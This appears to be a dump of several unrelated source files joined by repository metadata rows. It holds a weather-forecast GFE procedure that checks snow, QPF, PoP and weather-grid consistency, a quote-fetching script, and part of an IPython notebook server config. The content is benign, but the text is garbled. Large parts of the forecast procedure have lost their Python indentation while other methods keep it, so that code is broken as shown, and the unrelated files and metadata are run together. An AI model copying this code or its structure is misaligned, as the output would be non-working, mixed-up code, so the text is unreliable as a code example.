        # the duration and start time constraints, then it's been "locked".
        # I need to capture the consistency masks for each individual Wx grid
        # just in case I end up with inconsistencies.
        consistMaskList = []
        for wxIndex, wxGrid in enumerate(self.getGrids(
                'Fcst', 'Wx', 'SFC', gridTR, mode='List', noDataError=0,
                cache=0)):
            # wxMask is from SmartScript
            sMask = self.wxMask(wxGrid, ':S:')
            swMask = self.wxMask(wxGrid, ':SW:')
            ipMask = self.wxMask(wxGrid, ':IP:')
            snowMask = logical_or(logical_or(sMask, swMask), ipMask)
            del (sMask, swMask, ipMask)
            wxMask = logical_not(snowMask)
            # "Truth" table for the logical comparison follows
            # SnowAmt >= 0.1, 1; SnowAmt < 0.1, 0
            # Wx has S, SW, or IP, 0; Wx doesn't have S, SW, or IP, 1
            # SnowAmt >= 0.1 (1) and Wx has (0) = 0 (Good result)
            # SnowAmt >= 0.1 (1) and Wx doesn't have (1) = 1 (Bad result)
            # SnowAmt < 0.1 (0) and Wx has (0) = 0 (Good result)
            # SnowAmt < 0.1 (0) and Wx doesn't have (1) = 0 (Good result)
            #
            consistMask = logical_and(nonZeroMask, wxMask)
            # Only points inside the CWA edit area may be flagged.
            consistMask[logical_not(self.cwaMask)] = 0
            consistMaskList.append(consistMask)
            if not sometrue(ravel(consistMask)):
                # There were no inconsistencies with this Wx grid. Since only
                # one needs to be consistent, we don't need to do any more
                # checks.
                break
        else:
            # This block will only execute if the for loop runs to
            # completion, i.e., the break statement is not executed.
            # So, if we get here, we have an inconsistency and need to
            # highlight the appropriate grids.
            if inconGridColor:
                self.highlightGrids(
                    'Fcst', 'SnowAmt', 'SFC', gridTR, inconGridColor)
                self.highlightGrids(
                    'Fcst', 'Wx', 'SFC', gridTR, inconGridColor)
            # createGrid is from SmartScript
            for index in xrange(len(wxInfoList)):
                # Create temporary grids for each Wx grid. Limit the start and
                # end times of the temporary grids so that they don't extend
                # beyond the start and end times of the corresponding SnowAmt
                # grid.
                wxGridTR = wxInfoList[index].gridTime()
                tempGridStartTime = wxGridTR.startTime().unixTime()
                if tempGridStartTime < gridTR.startTime().unixTime():
                    tempGridStartTime = gridTR.startTime().unixTime()
                tempGridEndTime = wxGridTR.endTime().unixTime()
                if tempGridEndTime > gridTR.endTime().unixTime():
                    tempGridEndTime = gridTR.endTime().unixTime()
                tempGridDur = (tempGridEndTime - tempGridStartTime) / 3600
                offset = (tempGridStartTime - \
                    self.timeRange0_1.startTime().unixTime()) / 3600
                # Because the time range may be different for the temporary
                # grid, I need to create and use that time range when
                # creating the temporary grid.
                tempGridTR = self.createTimeRange(
                    offset, offset+tempGridDur, 'Zulu')
                self.createGrid(
                    'Fcst', 'SnowAmtWxInconsistent', 'SCALAR',
                    consistMaskList[index], tempGridTR,
                    descriptiveName='SnowAmtWxInconsistent',
                    minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
                if tempGridColor:
                    self.highlightGrids(
                        'Fcst', 'SnowAmtWxInconsistent', 'SFC', gridTR,
                        tempGridColor)
            self.inconsistent = True
        return
    def _snowAmtWxCheckUnlocked(self, nonZeroMask, gridTR, wxInfoList):
        """SnowAmt/Wx consistency for an "unlocked" SnowAmt grid.

        "Unlocked" means the SnowAmt grid does not meet the 6-hour /
        synoptic start-time constraints, so EVERY overlapping Wx grid must
        contain a snow type (S, SW or IP) wherever nonZeroMask is set.
        Each inconsistent Wx grid gets its own temporary
        'SnowAmtWxInconsistent' grid (clipped to the SnowAmt grid's time
        range) plus highlights; self.inconsistent is set True.
        """
        # The "Unlocked" comes from the idea that if the SnowAmt grid does
        # not meet the duration and start time constraints, then it's been
        # left "unlocked".
        for wxIndex, wxGrid in enumerate(self.getGrids(
                'Fcst', 'Wx', 'SFC', gridTR, mode='List', noDataError=0,
                cache=0)):
            # wxMask is from SmartScript
            sMask = self.wxMask(wxGrid, ':S:')
            swMask = self.wxMask(wxGrid, ':SW:')
            ipMask = self.wxMask(wxGrid, ':IP:')
            snowMask = logical_or(logical_or(sMask, swMask), ipMask)
            del (sMask, swMask, ipMask)
            wxMask = logical_not(snowMask)
            # "Truth" table for the logical comparison follows
            # SnowAmt >= 0.1, 1; SnowAmt < 0.1, 0
            # Wx has S, SW, or IP, 0; Wx doesn't have S, SW, or IP, 1
            # SnowAmt >= 0.1 (1) and Wx has (0) = 0 (Good result)
            # SnowAmt >= 0.1 (1) and Wx doesn't have (1) = 1 (Bad result)
            # SnowAmt < 0.1 (0) and Wx has (0) = 0 (Good result)
            # SnowAmt < 0.1 (0) and Wx doesn't have (1) = 0 (Good result)
            #
            # All Wx grids overlapping the SnowAmt grid must be consistent.
            consistMask = logical_and(nonZeroMask, wxMask)
            # Only points inside the CWA edit area may be flagged.
            consistMask[logical_not(self.cwaMask)] = 0
            if sometrue(ravel(consistMask)):
                # I'll highlight the SnowAmt grids and Wx grids in
                # gridTR as I did with QPF. However, I'll make
                # temporary grids here using the Wx grid's time
                # range but, the temporary grid cannot start before
                # the start of the corresponding SnowAmt grid nor can
                # it end after the end of the corresponding SnowAmt grid.
                wxGridTR = wxInfoList[wxIndex].gridTime()
                tempGridStartTime = wxGridTR.startTime().unixTime()
                if tempGridStartTime < gridTR.startTime().unixTime():
                    # Clip to start of SnowAmt grid
                    tempGridStartTime = gridTR.startTime().unixTime()
                tempGridEndTime = wxGridTR.endTime().unixTime()
                if tempGridEndTime > gridTR.endTime().unixTime():
                    # Clip to end of SnowAmtGrid
                    tempGridEndTime = gridTR.endTime().unixTime()
                tempGridDur = (tempGridEndTime - tempGridStartTime) / 3600
                offset = (tempGridStartTime - \
                    self.timeRange0_1.startTime().unixTime()) / 3600
                # Since either the front or end of the Wx grid's
                # time range may have been clipped, create a time
                # range using those values.
                tempGridTR = self.createTimeRange(
                    offset, offset+tempGridDur, 'Zulu')
                self.createGrid(
                    'Fcst', 'SnowAmtWxInconsistent', 'SCALAR', consistMask,
                    tempGridTR, descriptiveName='SnowAmtWxInconsistent',
                    minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
                if tempGridColor:
                    self.highlightGrids(
                        'Fcst', 'SnowAmtWxInconsistent', 'SFC', gridTR,
                        tempGridColor)
                if inconGridColor:
                    self.highlightGrids(
                        'Fcst', 'SnowAmt', 'SFC', gridTR, inconGridColor)
                    self.highlightGrids(
                        'Fcst', 'Wx', 'SFC', wxGridTR, inconGridColor)
                self.inconsistent = True
        return
def _runQPFPoPCheck(self, timeRange):
# This method implements the check that if any QPF grid is non zero
# then one of the corresponding floating PoP grids must also be non
# zero.
# There can be a significant difference between the values stored
# in memory and the values returned from the database. This is because
# when values are saved, the element's precision (as defined in
# serverConfig.py/localConfig.py) is enforced. Values in memory do not
# have the element's precision enforced; in fact, they have the
# machine precision of the underlying data type.
# If there are locks, post an urgent message and return from the method.
message = ''
# lockedByMe is from SmartScript
if self.lockedByMe('QPF', 'SFC'):
message = '%sYou have the QPF grid locked. Please save the QPF grid.\n' % message
if self.lockedByMe('PoP', 'SFC'):
message = '%sYou have the PoP grid locked. Please save the PoP grid.\n' % message
# lockedByOther is from SmartScript
if self.lockedByOther('QPF', 'SFC'):
message = '%sThe QPF grid is locked by someone else. Please have that person save the QPF grid.\n' % message
if self.lockedByOther('PoP', 'SFC'):
message = '%sThe PoP grid is locked by someone else. Please have that person save the PoP grid.\n' % message
if message:
message = '%sThe QPF/PoP Check was not run.' % message
self.statusBarMsg(message, 'U')
# I return instead of aborting because the user may have asked for
# other tests that do not have locked grid problems.
return
# Make sure there are actually QPF grids in the time range.
# The self.getGrids command will return None if there are no grids
# in the time range for mode='First' and noDataError=0. The None
# variable cannot be iterated over. Rather than trap in a try/except,
# I'll just check for the condititon. This may not be the most
# Pythonic way of doing things, but it allows me to avoid having
# a bunch of code indented beneath a try statement. If no SnowAmt
# grids are found, post an urgent message and return from the method.
# getGrids is from SmartScript
qpfInfoList = self.getGridInfo('Fcst', 'QPF', 'SFC', timeRange)
if [] == qpfInfoList:
message = 'There are no QPF grids in the time range you selected.\nThe QPF/PoP Check did not run.'
self.statusBarMsg(message, 'U')
# I return instead of aborting because the user may have asked for
# other tests that do not have missing grid problems.
return
qpfGrids = self.getGrids(
'Fcst', 'QPF', 'SFC', timeRange, mode='List', noDataError=0,
cache=0)
for qpfIndex, qpfGrid in enumerate(qpfGrids):
gridTR = qpfInfoList[qpfIndex].gridTime()
popGrid = self.getGrids(
'Fcst', 'PoP', 'SFC', gridTR, mode='Max', noDataError=0,
cache=0)
if popGrid is None:
message = '''There are no PoP grids in time range %s.
The QPF/PoP Check skipped the time range.''' % gridTR
self.statusBarMsg(message, 'U')
continue
qpfNonZeroMask = greater(qpfGrid, qpfTol)
popZeroMask = equal(popGrid, 0)
# popZeroMask = 1 if PoP = 0; popZeroMask = 0 if PoP != 0
# qpfNonZeroMask = 1 if QPF > 0; qpfNonZeroMask = 0 if QPF = 0
# PoP = 0 (1) and QPF = 0 (0) => 0 (Good result)
# PoP != 0 (0) and QPF = 0 (0) => 0 (Good result)
# PoP != 0 (0) and QPF > 0 (1) => 0 (Good result)
# PoP = 0 (1) and QPF > 0 (1) => 1 (Bad result)
consistMask = logical_and(qpfNonZeroMask, popZeroMask)
consistMask[logical_not(self.cwaMask)] = 0
if sometrue(ravel(consistMask)):
# The good result is if the logical_and returns zeros
# for every grid point, that is "none true". So, if
# the sometrue method evaluates True, there are
# inconsistencies.
self.createGrid(
'Fcst', 'QPFPoPInconsistent', 'SCALAR', consistMask, gridTR,
descriptiveName='QPFPoPInconsistent',
minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
if tempGridColor:
self.highlightGrids(
'Fcst', 'QPFPoPInconsistent', 'SFC', gridTR,
tempGridColor)
if inconGridColor:
self.highlightGrids(
'Fcst', 'QPF', 'SFC', gridTR, inconGridColor)
self.highlightGrids(
'Fcst', 'PoP', 'SFC', gridTR, inconGridColor)
self.inconsistent = True
##### Edited by Rob Radzanowski (WFO-CTP) 03-16-2009 to add missing NDFD check for QPF=0 & PoP > 50
##### which is causing unexplained yellow banners due to lack of checking for this error.
qpfZeroMask = equal(qpfGrid, 0)
popGrid = self.getGrids(
'Fcst', 'PoP', 'SFC', gridTR, mode='Max', noDataError=0, cache=0)
popGreater50Mask = greater(popGrid, 50)
# popGreater50Mask = 1 if PoP > 50; popGreater50Mask = 0 if PoP <= 50
# qpfZeroMask = 0 if QPF > 0; qpfZeroMask = 1 if QPF = 0
# PoP > 50 (1) and QPF > 0 (0) => 0 (Good result)
# PoP > 50 (1) and QPF = 0 (1) => 1 (Bad result)
# PoP <= 50 (0) and QPF > 0 (0) => 0 (Good/Irrelevant result)
# PoP <= 50 (0) and QPF = 0 (1) => 0 (Good result)
consistMask2 = logical_and(qpfZeroMask, popGreater50Mask)
consistMask2[logical_not(self.cwaMask)] = 0
if sometrue(ravel(consistMask2)):
# The good result is if the logical_and returns zeros
# for every grid point, that is "none true". So, if
# the sometrue method evaluates True, there are
# inconsistencies.
self.createGrid(
'Fcst', 'QPFPoPInconsistent', 'SCALAR', consistMask2, gridTR,
descriptiveName='QPFPoPInconsistent',
minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
if tempGridColor:
self.highlightGrids('Fcst', 'QPFPoPInconsistent', 'SFC', gridTR, tempGridColor)
if inconGridColor:
self.highlightGrids('Fcst', 'QPF', 'SFC', gridTR, inconGridColor)
self.highlightGrids('Fcst', 'PoP', 'SFC', gridTR, inconGridColor)
self.inconsistent = True
return
def _runQPFWxCheck(self, timeRange):
# This method implements the check that if QPF non zero, then the
# corresponding Wx grids must contain a precipitable Wx type. Note:
# the method only checks the Wx type, no cov/prob, no inten, etc.
# There can be a significant difference between the values stored
# in memory and the values returned from the database. This is because
# when values are saved, the element's precision (as defined in
# serverConfig.py/localConfig.py) is enforced. Values in memory do not
# have the element's precision enforced; in fact, they have the
# machine precision of the underlying data type.
# If there are locks, post an urgent message and return from the method.
message = ''
# lockedByMe is from SmartScript
if self.lockedByMe('QPF', 'SFC'):
message = '%sYou have the QPF grid locked. Please save the QPF grid.\n' % message
if self.lockedByMe('Wx', 'SFC'):
message = '%sYou have the Wx grid locked. Please save the Wx grid.\n' % message
# lockedByOther is from SmartScript
if self.lockedByOther('QPF', 'SFC'):
message = '%sThe QPF grid is locked by someone else. Please have that person save the QPF grid.\n' % message
if self.lockedByOther('Wx', 'SFC'):
message = '%sThe Wx grid is locked by someone else. Please have that person save the Wx grid.\n' % message
if message:
message = '%sThe QPF/Wx Check was not run.' % message
self.statusBarMsg(message, 'U')
# I return instead of aborting because the user may have asked for
# other tests that do not have locked grid problems.
return
# Make sure there are actually QPF grids in the time range.
# I'll just check for the condititon. If no SnowAmt
# grids are found, post an urgent message and return from the method.
qpfInfoList = self.getGridInfo('Fcst', 'QPF', 'SFC', timeRange)
if [] == qpfInfoList:
message = 'There are no QPF grids in the time range you selected.\nThe QPF/PoP Check did not run.'
self.statusBarMsg(message, 'U')
# I return instead of aborting because the user may have asked for
# other tests that do not have missing grid problems.
return
for qpfIndex, qpfGrid in enumerate(self.getGrids(
'Fcst', 'QPF', 'SFC', timeRange, mode='List', noDataError=0,
cache=0)):
qpfNonZeroMask = greater(qpfGrid, qpfTol)
gridTR = qpfInfoList[qpfIndex].gridTime()
wxInfoList = self.getGridInfo('Fcst', 'Wx', 'SFC', gridTR)
if [] == wxInfoList:
message = '''There are no Wx grids in time range %s.
The QPF/Wx Check skipped the time range.''' % gridTR
self.statusBarMsg(message, 'U')
continue
# There are two cases. If the QPF grid is exactly 6 hours long and
# starts at 00, 06, 12, or 18 UTC, then only one of the
# corresponding Wx grids needs to be consistent. Otherwise, all the
# corresponding Wx grids need to be consistent.
if gridTR.duration() / 3600 == 6 and gridTR.startTime().hour in (0, 6, 12, 18):
self._qpfWxCheckLocked(qpfNonZeroMask, gridTR, wxInfoList)
else:
self._qpfWxCheckUnlocked(qpfNonZeroMask, gridTR, wxInfoList)
return
    def _qpfWxCheckLocked(self, qpfNonZeroMask, gridTR, wxInfoList):
        """QPF/Wx consistency for a "locked" QPF grid.

        "Locked" means the QPF grid is exactly 6 hours long and starts at
        00, 06, 12 or 18 UTC; only ONE overlapping Wx grid needs a precip
        type (S, SW, IP, R, RW, L, ZL or ZR) wherever qpfNonZeroMask is
        set. If none qualifies, temporary 'QPFWxInconsistent' grids are
        created (clipped to the QPF grid's time range), the offending
        grids highlighted, and self.inconsistent set True.
        """
        # The "Locked" comes from the idea that if the QPF grid is
        # exactly 6 hours long and starts at 00, 06, 12, or 18 UTC, then it
        # is "locked".
        # Capture the consistency mask for each individual Wx grid in case
        # we end up with inconsistencies.
        consistMaskList = []
        for wxIndex, wxGrid in enumerate(self.getGrids(
                'Fcst', 'Wx', 'SFC', gridTR, mode='List', noDataError=0,
                cache=0)):
            # wxMask is from SmartScript
            sMask = self.wxMask(wxGrid, ':S:')
            swMask = self.wxMask(wxGrid, ':SW:')
            ipMask = self.wxMask(wxGrid, ':IP:')
            snowMask = logical_or(logical_or(sMask, swMask), ipMask)
            del (sMask, swMask, ipMask)
            rMask = self.wxMask(wxGrid, ':R:')
            rwMask = self.wxMask(wxGrid, ':RW:')
            lMask = self.wxMask(wxGrid, ':L:')
            zlMask = self.wxMask(wxGrid, ':ZL:')
            zrMask = self.wxMask(wxGrid, ':ZR:')
            # logical_or is from Numeric
            rainMask = logical_or(
                rMask, logical_or(
                    rwMask, logical_or(
                        lMask, logical_or(zlMask, zrMask))))
            del (rMask, rwMask, lMask, zlMask, zrMask)
            precipMask = logical_or(snowMask, rainMask)
            del (snowMask, rainMask)
            wxMask = logical_not(precipMask)
            # QPF >= 0.01, 1; QPF < 0.01, 0
            # Wx has precip, 0; Wx doesn't have precip, 1
            # QPF >= 0.01 (1) and Wx has (0) = 0 (Good result)
            # QPF >= 0.01 (1) and Wx doesn't have (1) = 1 (Bad result)
            # QPF < 0.01 (0) and Wx has (0) = 0 (Good result)
            # QPF < 0.01 (0) and Wx doesn't have (1) = 0 (Good result)
            consistMask = logical_and(qpfNonZeroMask, wxMask)
            # Only points inside the CWA edit area may be flagged.
            consistMask[logical_not(self.cwaMask)] = 0
            consistMaskList.append(consistMask)
            if not sometrue(ravel(consistMask)):
                # There were no inconsistencies with this Wx grid. Since only
                # one needs to be consistent, we don't need to do any more
                # checks.
                break
        else:
            # This block will only execute if the for loop runs to
            # completion, i.e., the break statement is not executed.
            # So, if we get here, we have an inconsistency and need to
            # highlight the appropriate grids.
            if inconGridColor:
                self.highlightGrids(
                    'Fcst', 'QPF', 'SFC', gridTR, inconGridColor)
                self.highlightGrids(
                    'Fcst', 'Wx', 'SFC', gridTR, inconGridColor)
            # createGrid is from SmartScript
            for index in xrange(len(wxInfoList)):
                # Create temporary grids for each Wx grid. Limit the time
                # range of the temporary grid so that it doesn't start any
                # earlier or any later than the corresponding QPF grid.
                wxGridTR = wxInfoList[index].gridTime()
                tempGridStartTime = wxGridTR.startTime().unixTime()
                if tempGridStartTime < gridTR.startTime().unixTime():
                    tempGridStartTime = gridTR.startTime().unixTime()
                tempGridEndTime = wxGridTR.endTime().unixTime()
                if tempGridEndTime > gridTR.endTime().unixTime():
                    tempGridEndTime = gridTR.endTime().unixTime()
                tempGridDur = (tempGridEndTime - tempGridStartTime) / 3600
                offset = (tempGridStartTime - \
                    self.timeRange0_1.startTime().unixTime()) / 3600
                # Since the temporary grid could have a different time range
                # than the Wx grid, I need to create and use that time range
                # when creating the temporary grid.
                tempGridTR = self.createTimeRange(
                    offset, offset+tempGridDur, 'Zulu')
                self.createGrid(
                    'Fcst', 'QPFWxInconsistent', 'SCALAR',
                    consistMaskList[index], tempGridTR,
                    descriptiveName='QPFWxInconsistent',
                    minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
                if tempGridColor:
                    self.highlightGrids(
                        'Fcst', 'QPFWxInconsistent', 'SFC', gridTR,
                        tempGridColor)
            self.inconsistent = True
        return
    def _qpfWxCheckUnlocked(self, qpfNonZeroMask, gridTR, wxInfoList):
        """QPF/Wx consistency for an "unlocked" QPF grid.

        "Unlocked" means the QPF grid is not exactly 6 hours long starting
        at 00, 06, 12 or 18 UTC, so EVERY overlapping Wx grid must have a
        precip type (S, SW, IP, R, RW, L, ZL or ZR) wherever
        qpfNonZeroMask is set. Each inconsistent Wx grid gets its own
        temporary 'QPFWxInconsistent' grid (clipped to the QPF grid's time
        range) plus highlights; self.inconsistent is set True.
        """
        # The "Unlocked" comes from the idea that if the QPF grid is not
        # exactly 6 hours long and starting at 00, 06, 12, or 18 UTC, then it
        # is "unlocked".
        for wxIndex, wxGrid in enumerate(self.getGrids(
                'Fcst', 'Wx', 'SFC', gridTR, mode='List', noDataError=0,
                cache=0)):
            # wxMask is from SmartScript
            sMask = self.wxMask(wxGrid, ':S:')
            swMask = self.wxMask(wxGrid, ':SW:')
            ipMask = self.wxMask(wxGrid, ':IP:')
            snowMask = logical_or(logical_or(sMask, swMask), ipMask)
            del (sMask, swMask, ipMask)
            rMask = self.wxMask(wxGrid, ':R:')
            rwMask = self.wxMask(wxGrid, ':RW:')
            lMask = self.wxMask(wxGrid, ':L:')
            zlMask = self.wxMask(wxGrid, ':ZL:')
            zrMask = self.wxMask(wxGrid, ':ZR:')
            # logical_or is from Numeric
            rainMask = logical_or(
                rMask, logical_or(
                    rwMask, logical_or(
                        lMask, logical_or(zlMask, zrMask))))
            del (rMask, rwMask, lMask, zlMask, zrMask)
            precipMask = logical_or(snowMask, rainMask)
            del (snowMask, rainMask)
            wxMask = logical_not(precipMask)
            # QPF >= 0.01, 1; QPF < 0.01, 0
            # Wx has precip, 0; Wx doesn't have precip, 1
            # QPF >= 0.01 (1) and Wx has (0) = 0 (Good result)
            # QPF >= 0.01 (1) and Wx doesn't have (1) = 1 (Bad result)
            # QPF < 0.01 (0) and Wx has (0) = 0 (Good result)
            # QPF < 0.01 (0) and Wx doesn't have (1) = 0 (Good result)
            #
            # All Wx grids overlapping the SnowAmt grid must be consistent.
            consistMask = logical_and(qpfNonZeroMask, wxMask)
            # Only points inside the CWA edit area may be flagged.
            consistMask[logical_not(self.cwaMask)] = 0
            if sometrue(ravel(consistMask)):
                # Build a temporary grid over the Wx grid's time range,
                # clipped so it neither starts before nor ends after the
                # corresponding QPF grid.
                wxGridTR = wxInfoList[wxIndex].gridTime()
                tempGridStartTime = wxGridTR.startTime().unixTime()
                if tempGridStartTime < gridTR.startTime().unixTime():
                    # Clip to start of QPF grid
                    tempGridStartTime = gridTR.startTime().unixTime()
                tempGridEndTime = wxGridTR.endTime().unixTime()
                if tempGridEndTime > gridTR.endTime().unixTime():
                    # Clip to end of QPF Grid
                    tempGridEndTime = gridTR.endTime().unixTime()
                tempGridDur = (tempGridEndTime - tempGridStartTime) / 3600
                offset = (tempGridStartTime - \
                    self.timeRange0_1.startTime().unixTime()) / 3600
                # Since either the front or end of the Wx grid's
                # time range may have been clipped, create a time
                # range using those values.
                tempGridTR = self.createTimeRange(
                    offset, offset+tempGridDur, 'Zulu')
                self.createGrid(
                    'Fcst', 'QPFWxInconsistent', 'SCALAR', consistMask,
                    tempGridTR, descriptiveName='QPFWxInconsistent',
                    minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
                if tempGridColor:
                    self.highlightGrids(
                        'Fcst', 'QPFWxInconsistent', 'SFC', gridTR,
                        tempGridColor)
                if inconGridColor:
                    self.highlightGrids(
                        'Fcst', 'QPF', 'SFC', gridTR, inconGridColor)
                    self.highlightGrids(
                        'Fcst', 'Wx', 'SFC', wxGridTR, inconGridColor)
                self.inconsistent = True
        return
def _calcTolerance(self, gridInfo):
precision = gridInfo.gridParmInfo.getPrecision()
return pow(10, -precision)
def execute(self, timeRange, varDict):
"""Entry point invoked by the GFE when the procedure runs.

Cleans up leftover temporary grids/highlights from a previous run,
then runs whichever of the SnowAmt/QPF, SnowAmt/Wx, QPF/PoP and
QPF/Wx consistency checks the user selected in the dialog, over the
selected time range (a sweep shorter than one hour is treated as "no
selection" and replaced by the full 0-240 hour range). Finishes by
posting a status-bar message describing the result.

timeRange -- the time range swept out by the user in the grid manager.
varDict -- dialog results; each checkbox entry is [] (unchecked) or
['Yes'] (checked), plus the 'Check_Cleanup' radio value.
NOTE(review): assumes SmartScript-provided helpers (createTimeRange,
statusBarMsg, encodeEditArea, getGridInfo) and module-level config
names (cwaEditArea, inconGridColor, tempGridColor) defined elsewhere
in this file -- confirm against the full procedure source.
"""
# Make sure the configuration values are the correct types.
self.__checkConfigValueTypes()
# createTimeRange is from SmartScript
timeRange0_240 = self.createTimeRange(0, 241, 'Zulu')
checkCleanup = varDict.get('Check_Cleanup', 'Check')
self.__cleanup(timeRange0_240)
if checkCleanup == 'Cleanup':
message = 'SnowQPFPoPWxCheck complete.'
self.statusBarMsg(message, 'R')
self.cancel()
if timeRange.endTime().unixTime() - timeRange.startTime().unixTime() < \
3600: # No time range selected, use create a 0 to 240 hour range
timeRange = timeRange0_240
# If the user has a time range swept out, send an informational
# message.
if (timeRange.startTime().unixTime() != timeRange0_240.startTime().unixTime()) or \
(timeRange.endTime().unixTime() != timeRange0_240.endTime().unixTime()) or \
(timeRange.duration() != timeRange0_240.duration()):
message = 'The SnowAmtQPFPoPWxCheck procedure did not run over the 0 to 240 hour time period,\nit ran over %s. This may be what you desired.' % str(timeRange)
self.statusBarMsg(message, 'S')
# I'll need to know the unix time of 00Z so I can determine the
# start time of temporary grids later. I'll need this in more than
# one of the methods called later, so this will become an instance
# variable, i.e., prefixed with "self." I also need an instance
# variable that flags whether or not there were inconsistent grids.
self.timeRange0_1 = self.createTimeRange(0, 1, 'Zulu')
self.inconsistent = False
# A CWA edit area can be provided in the configuration section.
# Attempt to encode that edit area as a Numeric Python mask so that
# the later checks are limited to the edit area. The GFE is not very
# friendly if the encoding fails. The GFE will send a nasty message
# to the user, but continue executing the procedure. No trappable
# error is thrown. As of this writing, the GFE appears to create an
# array of shape (0, 0) if the encoding cannot be done, so I will
# check for that and, if I find it, then set the edit area to the
# domain.
# encodeEditArea comes from SmartScript. For the points that are in
# the edit area, a value of one is assigned. Otherwise, a value of
# zero is assigned.
if cwaEditArea:
self.cwaMask = self.encodeEditArea(cwaEditArea)
if self.cwaMask.shape == (0, 0):
# Use the getGridInfo command to get information about the
# SnowAmt grid. From this, the grid size can be extracted. I
# could use getGridInfo on any valid GFE grid.
# getGridInfo is from SmartScript
snowAmtInfoList = self.getGridInfo(
'Fcst', 'SnowAmt', 'SFC', timeRange)
# I painfully discovered that the array shape is (y, x)
gridSize = (snowAmtInfoList[0].gridLocation().gridSize().y,
snowAmtInfoList[0].gridLocation().gridSize().x)
# ones is from Numeric. It creates an array of the given size
# and data type where all values are one.
self.cwaMask = ones(gridSize, Int)
message = \
'''The procedure was not able to use the CWA edit area, %s, provided
in the configuration. You should inform the person responsible for procedures
of this problem. The procedure ran over the whole domain.''' % cwaEditArea
self.statusBarMsg(message, 'S')
else:
snowAmtInfoList = self.getGridInfo(
'Fcst', 'SnowAmt', 'SFC', timeRange)
gridSize = (snowAmtInfoList[0].gridLocation().gridSize().y,
snowAmtInfoList[0].gridLocation().gridSize().x)
self.cwaMask = ones(gridSize, Int)
# Based on the user's input, run the appropriate checks.
# By making each of these options a checkbox with only one option in
# the VariableList above, if an option is unchecked then an empty
# list, [], will be what's in varDict. If an option is checked then a
# list with the value "Yes", ["Yes"], will be what's in varDict. In
# Python, a conditional expression can be whether or not a data
# structure is empty. In these cases, an empty data structure,
# e.g., an empty list, an empty tuple, an empty dictionary,
# conditionally test to False while non empty data structures
# conditionally test to True. In the if statements below, every varDict
# lookup returns a list: either [] or ["Yes"]. I think the constructs
# below or more elegant and easier to understand.
if varDict['Run SnowAmt/QPF Check?']:
# Call the SnowAmt/QPF check method
self._runSnowAmtQPFCheck(timeRange)
if varDict['Run SnowAmt/Wx Check?']:
# Call the SnowAmt/Wx check method
self._runSnowAmtWxCheck(timeRange)
if varDict['Run QPF/PoP Check?']:
# Call the QPF/PoP check method
self._runQPFPoPCheck(timeRange)
if varDict['Run QPF/Wx Check?']:
# Call the QPF/Wx check method
self._runQPFWxCheck(timeRange)
message = 'SnowAmtQPFPoPWxCheck complete.'
if self.inconsistent:
message = '%s Inconsistencies found! Grids highlighted %s and %s.' % (
message, inconGridColor, tempGridColor)
self.statusBarMsg(message, 'S')
else:
self.statusBarMsg(message, 'R')
| [
"mjames@unidata.ucar.edu"
] | mjames@unidata.ucar.edu |
74dbb2d761f0933956fd053d1d298ae037799303 | 991ef9b36fbe85f7d611124f4059ac3715039640 | /fetch.py | 260de0ea4e63f1c1a81eb4325276617d10398ff6 | [] | no_license | zeddo123/Quotefetch | 7c435d2beaf448c0c6135b10154a6a9d637b7dc6 | df74ab397413ce728792564392b020bd84275923 | refs/heads/master | 2021-07-05T21:36:37.872916 | 2020-09-01T09:20:58 | 2020-09-01T09:20:58 | 172,564,321 | 13 | 2 | null | null | null | null | UTF-8 | Python | false | false | 914 | py | #!/usr/bin/env python3
"""Fetch a random quote from quotedb.com and write it, ANSI-colored, to a file."""
from utils import *

line_len = 8            # maximum number of words in one line
text_color = ''         # ANSI color of the quote text (default: white)
type_of_quote = '“”'    # quotation marks to use, e.g. '«»'
quote_color = '1;33'    # ANSI color of the quotation marks
file_name = 'quote.txt'
url = 'https://www.quotedb.com/quote/quote.php?action=random_quote'

try:
    raw = get_content(url).decode()
except Exception:
    # A bare `except:` would also swallow KeyboardInterrupt/SystemExit;
    # Exception is broad enough for any network or decoding failure here.
    print('Connection Error')
    exit()

# remove_web appears to return (quote text, author) -- see indexing below.
quote = remove_web(raw)
content = quote[0]
author = quote[1]

words = content.split(' ')
lines = create_lines(words, line_len)
format_str(lines)
lines = [i + '\n' for i in lines]  # add a newline character to every line

with open(file_name, 'w') as out:
    out.write(f'\033[{quote_color}m{type_of_quote[0]} \033[{text_color}m')
    for line in lines:
        out.write(line)
    # Pad with spaces so the closing mark and author align with the longest
    # line. The original used len(max(lines)), which is the length of the
    # lexicographically greatest line, not of the longest one.
    out.write(f'{(max(len(l) for l in lines) - len(author)) * " "} \033[{quote_color}m{type_of_quote[1]}\033[{text_color}m {author}\n')
"mouhadrissi9@gmail.com"
] | mouhadrissi9@gmail.com |
3c8c459ca3da25ea02f13f4269af68969c2b9943 | a2793ecc10f3a683ab6fbe045b71c78b1cafb7b8 | /ipython/profile_flowml_server/ipython_notebook_config.py | dab5cffdb3374ff141c6f36893c7dcc2cfa49d67 | [] | no_license | jeffrey-hokanson/FlowML | 4e67cba1f1ade0485824aa702fa872f645791562 | 878f318bdde53365f1b2f75725376bdbd4485f7e | refs/heads/master | 2021-01-22T13:42:54.142314 | 2015-01-29T00:31:36 | 2015-01-29T00:31:36 | 21,365,669 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 24,593 | py | # Configuration file for ipython-notebook.
# IPython notebook server configuration (loaded by `ipython notebook`).
c = get_config()

# Render matplotlib figures inline in the notebook.
c.IPKernelApp.pylab = 'inline'

# TODO: This should be passed in by the start_server.sh script
root = u'/Users/jhokanson/SVN/FlowML/'

# This should be an absolute path so that the server finds the certificate
# regardless of the directory it is launched from.
c.NotebookApp.certfile = root + u'mycert.pem'
c.NotebookApp.ip = '*'  # listen on all interfaces
c.NotebookApp.open_browser = False
c.NotebookApp.port = 9000

# Read the hashed password from an independent file so the secret is not
# stored in this config file. `with` guarantees the handle is closed even
# if readline() raises.
with open(root + u'password.sha1') as f:
    password = f.readline()

# IPython.lib.passwd() output is 'sha1:<12-char salt>:<40-char hex digest>',
# which is exactly 58 characters; the slice also drops the trailing newline.
if password[0:4] == u'sha1':
    c.NotebookApp.password = password[0:58]
#------------------------------------------------------------------------------
# NotebookApp configuration
#------------------------------------------------------------------------------
# NotebookApp will inherit config from: BaseIPythonApplication, Application
